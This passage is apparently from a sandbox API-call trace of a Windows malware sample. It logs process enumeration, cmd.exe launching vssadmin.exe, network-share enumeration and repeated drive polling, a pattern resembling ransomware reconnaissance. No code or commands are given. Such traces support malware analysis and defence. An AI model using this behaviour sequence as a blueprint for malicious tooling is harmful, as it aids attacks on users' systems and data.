(lpString="svchost.exe") returned 11 [0224.574] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.575] lstrlenW (lpString="svchost.exe") returned 11 [0224.575] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.576] lstrlenW (lpString="svchost.exe") returned 11 [0224.576] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x12c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.577] lstrlenW (lpString="svchost.exe") returned 11 [0224.577] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x24, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.577] lstrlenW (lpString="svchost.exe") returned 11 [0224.577] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.578] lstrlenW (lpString="svchost.exe") returned 11 [0224.578] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.579] lstrlenW (lpString="svchost.exe") returned 11 [0224.579] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x530, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.580] lstrlenW (lpString="svchost.exe") returned 11 [0224.580] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x538, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.580] lstrlenW (lpString="svchost.exe") returned 11 [0224.581] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0224.581] lstrlenW (lpString="spoolsv.exe") returned 11 [0224.581] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.582] lstrlenW (lpString="svchost.exe") returned 11 [0224.582] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.583] lstrlenW (lpString="svchost.exe") returned 11 [0224.583] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0224.583] lstrlenW (lpString="audiodg.exe") returned 11 [0224.584] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0224.584] lstrlenW (lpString="sihost.exe") returned 10 [0224.584] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.585] lstrlenW (lpString="svchost.exe") returned 11 [0224.585] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.586] lstrlenW (lpString="taskhostw.exe") returned 13 [0224.586] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0224.586] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0224.586] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0224.587] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0224.587] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3d, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0224.588] lstrlenW (lpString="explorer.exe") returned 12 [0224.588] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0224.589] lstrlenW (lpString="Memory Compression") returned 18 [0224.589] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0224.589] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0224.590] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0224.590] lstrlenW (lpString="SearchUI.exe") returned 12 [0224.590] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0224.591] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0224.591] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.592] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0224.592] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0224.592] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0224.592] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0224.593] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0224.593] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x368, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.594] lstrlenW (lpString="conhost.exe") returned 11 [0224.594] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="roof competitive.exe")) returned 1 [0224.595] lstrlenW (lpString="roof competitive.exe") returned 20 [0224.595] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="trustees.exe")) returned 1 [0224.595] lstrlenW (lpString="trustees.exe") returned 12 [0224.595] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd68, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="retailerssoleanxiety.exe")) returned 1 [0224.596] lstrlenW (lpString="retailerssoleanxiety.exe") returned 24 [0224.596] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="isbn.exe")) returned 1 [0224.597] lstrlenW (lpString="isbn.exe") returned 8 [0224.597] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="sega_danger_verse.exe")) returned 1 [0224.598] lstrlenW (lpString="sega_danger_verse.exe") returned 21 [0224.598] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tabs_dimensions.exe")) returned 1 [0224.598] lstrlenW (lpString="tabs_dimensions.exe") returned 19 [0224.598] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x668, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerts_input_maybe.exe")) returned 1 [0224.599] lstrlenW (lpString="concerts_input_maybe.exe") returned 24 [0224.599] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="nearby-installations-wise.exe")) returned 1 [0224.600] lstrlenW (lpString="nearby-installations-wise.exe") returned 29 [0224.600] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="statementswalkstramadol.exe")) returned 1 [0224.601] lstrlenW (lpString="statementswalkstramadol.exe") returned 27 [0224.601] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdb4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="playstation iraq.exe")) returned 1 [0224.601] lstrlenW (lpString="playstation iraq.exe") returned 20 [0224.601] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="harbor.exe")) returned 1 [0224.602] lstrlenW (lpString="harbor.exe") returned 10 [0224.602] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x86c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="promoting-walker-outdoor.exe")) returned 1 [0224.603] lstrlenW (lpString="promoting-walker-outdoor.exe") returned 28 [0224.603] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charlie_sperm_new.exe")) returned 1 [0224.604] lstrlenW (lpString="charlie_sperm_new.exe") returned 21 [0224.604] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="marie-lebanon.exe")) returned 1 [0224.604] lstrlenW (lpString="marie-lebanon.exe") returned 17 [0224.604] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="bad-length-especially.exe")) returned 1 [0224.605] lstrlenW (lpString="bad-length-especially.exe") returned 25 [0224.605] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x910, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="larent.exe")) returned 1 [0224.606] lstrlenW (lpString="larent.exe") returned 10 [0224.606] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="stereo.exe")) returned 1 [0224.607] lstrlenW (lpString="stereo.exe") returned 10 [0224.607] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="charge arrival racial.exe")) returned 1 [0224.607] lstrlenW (lpString="charge arrival racial.exe") returned 25 [0224.607] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="uniprotkbthusembassy.exe")) returned 1 [0224.608] lstrlenW (lpString="uniprotkbthusembassy.exe") returned 24 [0224.608] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x26c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="state.exe")) returned 1 [0224.609] lstrlenW (lpString="state.exe") returned 9 [0224.609] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xda4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="TrustedInstaller.exe")) returned 1 [0224.610] lstrlenW (lpString="TrustedInstaller.exe") returned 20 [0224.610] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd84, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0224.611] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0224.611] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfa4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0224.612] lstrlenW (lpString="taskhostw.exe") returned 13 [0224.612] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0224.613] lstrlenW (lpString="sppsvc.exe") returned 10 [0224.613] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0224.614] lstrlenW (lpString="svchost.exe") returned 11 [0224.614] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="Pg.exe")) returned 1 [0224.615] lstrlenW (lpString="Pg.exe") returned 6 [0224.615] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0224.616] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0224.616] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf94, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf9c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.616] lstrlenW (lpString="conhost.exe") returned 11 [0224.616] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf44, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0224.617] lstrlenW (lpString="cmd.exe") returned 7 [0224.617] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.618] lstrlenW (lpString="conhost.exe") returned 11 [0224.618] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xef4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x9c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0224.619] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0224.619] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x46c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xef4, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0224.620] lstrlenW (lpString="conhost.exe") returned 11 [0224.620] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0224.620] lstrlenW (lpString="vssadmin.exe") returned 12 [0224.620] Process32NextW (in: hSnapshot=0x45c, lppe=0x291fd2c | out: lppe=0x291fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf44, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0224.621] CloseHandle (hObject=0x45c) returned 1 [0224.621] Sleep (dwMilliseconds=0x1f4) Thread: id = 9 os_tid = 0xd7c [0190.634] WaitForSingleObject (hHandle=0x19de18, dwMilliseconds=0xffffffff) returned 0xffffffff [0190.634] HeapFree (in: hHeap=0x5e0000, dwFlags=0x0, lpMem=0x606980 | out: hHeap=0x5e0000) returned 1 Thread: id = 10 os_tid = 0xda8 [0190.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x10) returned 0x2379448 [0190.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x2379448, Size=0x20) returned 0x236b878 [0190.635] RtlReAllocateHeap (Heap=0x5e0000, Flags=0x0, Ptr=0x236b878, Size=0x40) returned 0x60acd8 [0190.635] GetLogicalDrives () returned 0x4 [0190.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0xfffe) returned 0x23797f8 [0190.635] GetComputerNameW (in: lpBuffer=0x23797fc, nSize=0x2b1ff64 | out: lpBuffer="NQDPDE", nSize=0x2b1ff64) returned 1 [0190.635] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x236c6d0 [0190.635] WNetOpenEnumW (in: dwScope=0x3, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2b1ff34 | out: lphEnum=0x2b1ff34*=0x5fc438) returned 0x0 [0190.637] WNetEnumResourceW (in: hEnum=0x5fc438, lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38 | out: lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38) returned 0x103 [0190.637] WNetCloseEnum (hEnum=0x5fc438) returned 0x0 [0190.637] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x0, lphEnum=0x2b1ff34 | out: lphEnum=0x2b1ff34*=0x604838) returned 0x0 [0195.813] WNetEnumResourceW (in: hEnum=0x604838, lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38 | out: lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38) returned 0x0 [0195.813] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x3f82270 [0195.813] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x236c6d0, lphEnum=0x2b1ff08 | out: lphEnum=0x2b1ff08*=0x5fc738) returned 0x0 [0195.815] WNetEnumResourceW (in: hEnum=0x5fc738, lpcCount=0x2b1ff04, lpBuffer=0x3f82270, lpBufferSize=0x2b1ff0c | out: lpcCount=0x2b1ff04, lpBuffer=0x3f82270, lpBufferSize=0x2b1ff0c) returned 0x103 [0195.815] WNetCloseEnum (hEnum=0x5fc738) returned 0x0 [0195.815] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x3f8a2b0 [0195.815] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x236c6f0, lphEnum=0x2b1ff08 | out: lphEnum=0x2b1ff08*=0x0) returned 0x4b8 [0215.089] RtlAllocateHeap (HeapHandle=0x5e0000, Flags=0x0, Size=0x1000) returned 0x40a8f00 [0215.089] WNetOpenEnumW (in: dwScope=0x2, dwType=0x1, dwUsage=0x0, lpNetResource=0x236c710, lphEnum=0x2b1ff08 | out: lphEnum=0x2b1ff08*=0x0) returned 0x4c6 [0215.090] WNetEnumResourceW (in: hEnum=0x604838, lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38 | out: lpcCount=0x2b1ff30, lpBuffer=0x236c6d0, lpBufferSize=0x2b1ff38) returned 0x103 [0215.090] WNetCloseEnum (hEnum=0x604838) returned 0x0 [0215.090] GetLogicalDrives () returned 0x4 [0215.090] Sleep (dwMilliseconds=0x64) [0215.317] GetLogicalDrives () returned 0x4 [0215.317] Sleep (dwMilliseconds=0x64) [0215.432] GetLogicalDrives () returned 0x4 [0215.432] Sleep (dwMilliseconds=0x64) [0215.542] GetLogicalDrives () returned 0x4 [0215.542] Sleep (dwMilliseconds=0x64) [0215.656] GetLogicalDrives () returned 0x4 [0215.656] Sleep (dwMilliseconds=0x64) [0215.760] GetLogicalDrives () returned 0x4 [0215.760] Sleep (dwMilliseconds=0x64) [0215.915] GetLogicalDrives () 